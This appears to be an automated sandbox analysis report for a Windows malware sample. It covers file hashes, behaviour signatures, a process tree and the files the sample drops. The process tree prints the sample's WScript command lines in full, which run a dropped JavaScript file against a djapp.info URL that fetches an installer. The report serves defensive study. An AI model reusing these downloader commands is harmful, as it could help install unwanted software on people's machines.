Analysis
-
max time kernel
117s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
29/05/2024, 05:34
Static task
static1
Behavioral task
behavioral1
Sample
7fa72441493abf24c04b12c5ac7dbd56_JaffaCakes118.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
7fa72441493abf24c04b12c5ac7dbd56_JaffaCakes118.exe
Resource
win10v2004-20240508-en
General
-
Target
7fa72441493abf24c04b12c5ac7dbd56_JaffaCakes118.exe
-
Size
184KB
-
MD5
7fa72441493abf24c04b12c5ac7dbd56
-
SHA1
a70d6874f2730ea2fd4efb20a402d5bcf6efcd06
-
SHA256
f8f223ecc842e99e7b1a30ac5f6688db165543ed45e42a17c35439ff25bb8888
-
SHA512
03a8f3b3da0512f06f030088d76327cad7aeb050dca105d2e60160a0a8db6c21a0652b2725c30c180b5bf4a035c21f13daee9ab246c88b154d2b1386d79684b6
-
SSDEEP
3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO3qN:/7BSH8zUB+nGESaaRvoB7FJNndn/N
Malware Config
Signatures
-
Blocklisted process makes network request 12 IoCs
flow pid Process 6 2532 WScript.exe 8 2532 WScript.exe 10 2532 WScript.exe 12 2404 WScript.exe 13 2404 WScript.exe 15 588 WScript.exe 16 588 WScript.exe 18 1168 WScript.exe 19 1168 WScript.exe 21 1204 WScript.exe 22 1204 WScript.exe 26 1204 WScript.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 20 IoCs
description pid Process procid_target PID 2212 wrote to memory of 2532 2212 7fa72441493abf24c04b12c5ac7dbd56_JaffaCakes118.exe 28 PID 2212 wrote to memory of 2532 2212 7fa72441493abf24c04b12c5ac7dbd56_JaffaCakes118.exe 28 PID 2212 wrote to memory of 2532 2212 7fa72441493abf24c04b12c5ac7dbd56_JaffaCakes118.exe 28 PID 2212 wrote to memory of 2532 2212 7fa72441493abf24c04b12c5ac7dbd56_JaffaCakes118.exe 28 PID 2212 wrote to memory of 2404 2212 7fa72441493abf24c04b12c5ac7dbd56_JaffaCakes118.exe 30 PID 2212 wrote to memory of 2404 2212 7fa72441493abf24c04b12c5ac7dbd56_JaffaCakes118.exe 30 PID 2212 wrote to memory of 2404 2212 7fa72441493abf24c04b12c5ac7dbd56_JaffaCakes118.exe 30 PID 2212 wrote to memory of 2404 2212 7fa72441493abf24c04b12c5ac7dbd56_JaffaCakes118.exe 30 PID 2212 wrote to memory of 588 2212 7fa72441493abf24c04b12c5ac7dbd56_JaffaCakes118.exe 32 PID 2212 wrote to memory of 588 2212 7fa72441493abf24c04b12c5ac7dbd56_JaffaCakes118.exe 32 PID 2212 wrote to memory of 588 2212 7fa72441493abf24c04b12c5ac7dbd56_JaffaCakes118.exe 32 PID 2212 wrote to memory of 588 2212 7fa72441493abf24c04b12c5ac7dbd56_JaffaCakes118.exe 32 PID 2212 wrote to memory of 1168 2212 7fa72441493abf24c04b12c5ac7dbd56_JaffaCakes118.exe 36 PID 2212 wrote to memory of 1168 2212 7fa72441493abf24c04b12c5ac7dbd56_JaffaCakes118.exe 36 PID 2212 wrote to memory of 1168 2212 7fa72441493abf24c04b12c5ac7dbd56_JaffaCakes118.exe 36 PID 2212 wrote to memory of 1168 2212 7fa72441493abf24c04b12c5ac7dbd56_JaffaCakes118.exe 36 PID 2212 wrote to memory of 1204 2212 7fa72441493abf24c04b12c5ac7dbd56_JaffaCakes118.exe 38 PID 2212 wrote to memory of 1204 2212 7fa72441493abf24c04b12c5ac7dbd56_JaffaCakes118.exe 38 PID 2212 wrote to memory of 1204 2212 7fa72441493abf24c04b12c5ac7dbd56_JaffaCakes118.exe 38 PID 2212 wrote to memory of 1204 2212 7fa72441493abf24c04b12c5ac7dbd56_JaffaCakes118.exe 38
Processes
-
C:\Users\Admin\AppData\Local\Temp\7fa72441493abf24c04b12c5ac7dbd56_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\7fa72441493abf24c04b12c5ac7dbd56_JaffaCakes118.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2212 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf8862.js" http://www.djapp.info/?domain=hAjbOBFgSC.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=O9BVGtj2a-YEr6Zs3wyYH6qubo4P1YmGmGYrhLIFYhTJiUp2-KcxyCtDJmXHwE0 C:\Users\Admin\AppData\Local\Temp\fuf8862.exe2⤵
- Blocklisted process makes network request
PID:2532
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf8862.js" http://www.djapp.info/?domain=hAjbOBFgSC.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=O9BVGtj2a-YEr6Zs3wyYH6qubo4P1YmGmGYrhLIFYhTJiUp2-KcxyCtDJmXHwE0 C:\Users\Admin\AppData\Local\Temp\fuf8862.exe2⤵
- Blocklisted process makes network request
PID:2404
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf8862.js" http://www.djapp.info/?domain=hAjbOBFgSC.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=O9BVGtj2a-YEr6Zs3wyYH6qubo4P1YmGmGYrhLIFYhTJiUp2-KcxyCtDJmXHwE0 C:\Users\Admin\AppData\Local\Temp\fuf8862.exe2⤵
- Blocklisted process makes network request
PID:588
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf8862.js" http://www.djapp.info/?domain=hAjbOBFgSC.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=O9BVGtj2a-YEr6Zs3wyYH6qubo4P1YmGmGYrhLIFYhTJiUp2-KcxyCtDJmXHwE0 C:\Users\Admin\AppData\Local\Temp\fuf8862.exe2⤵
- Blocklisted process makes network request
PID:1168
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf8862.js" http://www.djapp.info/?domain=hAjbOBFgSC.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=O9BVGtj2a-YEr6Zs3wyYH6qubo4P1YmGmGYrhLIFYhTJiUp2-KcxyCtDJmXHwE0 C:\Users\Admin\AppData\Local\Temp\fuf8862.exe2⤵
- Blocklisted process makes network request
PID:1204
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
Filesize1KB
MD5b9a6ce2d8d958f97f33e4c90383555b0
SHA11dfc439a009c45eb482547d65aeee88675679279
SHA25635c92a56b5f0f8520f27ee9b8d093c80deeb4f7599dbedfa8619559986db3c03
SHA5120395ce6722e8663e946c8ab45bf6b28dde3d77c42ce893dd5d9174bb1c2c287b5ec4cb165ab2c606c13b39a72af14ea2d1b63bd3f21b766f8969b6d18db920f3
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464
Filesize724B
MD58202a1cd02e7d69597995cabbe881a12
SHA18858d9d934b7aa9330ee73de6c476acf19929ff6
SHA25658f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5
SHA51297ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
Filesize410B
MD5f2aaefc47cdf601b2ef2391bc1f0568c
SHA14ada6df6616e457f2472310b2ce251ae8827eb43
SHA256f7ae547e9e6d16583b83ca761a4a40854aca923a722c82d4d68c376176e83a26
SHA512d41bbad66596e0ab81b9bf8fb567e4038c5d625419746b983ccbd20514b1c6f55a4252ca22367ecba314fe4f481c40804a48ce8ac9c33985533cdfddc1b2b5fa
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD59869b218a9fe9e0f5f69a18d208762de
SHA149a91740a6cbf261a6eb3db8e60218bb5a5548bb
SHA256182e2924703a3ca6b8b215bbabaab27c8341caa9f0d417974bfd93c0cadad7dc
SHA512eadd5d8ef570b404126954d13b2f9c107e22453fc45ea0a1f157aa816598bef18b1c377451f5dc5e5a5ed467c6e3e225f602b4dc27b12dcb87634e677f9c25a6
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464
Filesize392B
MD59fd0497ad5ad47d7845165819b03dda1
SHA180aa44c8a88e1744861d1943fb9a352282896657
SHA256361992cbbcb522051c9fc29a1d6165826a23a855a064cbe995d6dc7c412383c8
SHA51269f511f1de7f538190a871f90dcec819e4b5947e79c0cf4a686472f7e008b7e7dd28fe7304972a74012d07e26e9ed5fbcc2554dfe33ead5c726d5697e681fb8f
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5DKX8QD5\domain_profile[1].htm
Filesize6KB
MD5c3a95b05e4557e1e69b1392272e266d9
SHA1b9bb5082baa76b48b5c35f50d3b3088755f19ecd
SHA2567931b7f8e8c729804136abfd7eaff37c3641ab9cb03aca3b4003e2d3f98617d6
SHA512855689fbe8675e54a5ff38f0505eb227d17942037236f9128ba1e9dafe3f865d4b2c26270e24d992b2bdb1cea6185a115c504a86c400911fb7d4dc5ab6bd11b9
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5DKX8QD5\domain_profile[1].htm
Filesize6KB
MD5de61f4ca9ef283baba50dcf520ec7b83
SHA17019687a366f8c9b8b6df5b22ff5812b22ff17de
SHA256a9ba10df4f653bb85827b54afee986c7f5f85d6f0337976daaf6f72a778ce2d0
SHA512eb75fa3589aa7f570ac7c99d01c7e9c0fa28f30ba9aab9e6b812df4b58ae961e03b40533d83a803f83b5034bbd4c1afe3b9770b8747769b271776ae9cd74bb4d
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\L9PN2QMY\domain_profile[1].htm
Filesize40KB
MD5f2a2181a8d8421890a13bff21d32b23a
SHA16458f34f53a8221c160a2396e0d4ba46484d3fd0
SHA256e14603765ede6bd5ceaf29d48dd598fbdb74522bec1c7bfb2081cdc59b191a94
SHA512dd3f0930e60cc95faedd5d4aed5973711b10e9a7f3b37069284dfa8e2aa260d5a4076c611fe82284468e92e75c59200653368c6f2605d50108c99f4c5179b491
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\L9PN2QMY\domain_profile[1].htm
Filesize6KB
MD5e6347c05ccfb6f48c26340b762f085df
SHA1a5cba36f978b39710b93e24e564122fbaf0b58a5
SHA25641cddc8332b75deac4ff5b7a530e3a710a718141210512f7bad21740a190fecd
SHA512dc30f3bf3543e2f7c9be45010e6e1d9062bd0a22457561c5ffa5b0bb87ceff727165c650938fcc044eb1d74a4d224447b96c30b8199652318668e16e4fe715c6
-
Filesize
65KB
MD5ac05d27423a85adc1622c714f2cb6184
SHA1b0fe2b1abddb97837ea0195be70ab2ff14d43198
SHA256c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d
SHA5126d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d
-
Filesize
171KB
MD59c0c641c06238516f27941aa1166d427
SHA164cd549fb8cf014fcd9312aa7a5b023847b6c977
SHA2564276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f
SHA512936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06
-
Filesize
3KB
MD53813cab188d1de6f92f8b82c2059991b
SHA14807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb
SHA256a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e
SHA51283b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76
-
Filesize
177B
MD5e8d7db60e1015ccec7a1b9d6f250c609
SHA15f3a1b2b72ca6081222448ddae47363a554c82e6
SHA256f708ca5d1d37145144f83648f3e5ef5581854f9660a3e1e35546e35478fe11c9
SHA512e4b1b06f918746998e8f70931d91f53e6cb4c4904442e6028a203b0fbb9e79cee9aeb32f7a0dc6a07c41b61ae1ddcb54bac4ae5f529aa1c5d2d20b50ff53cbfe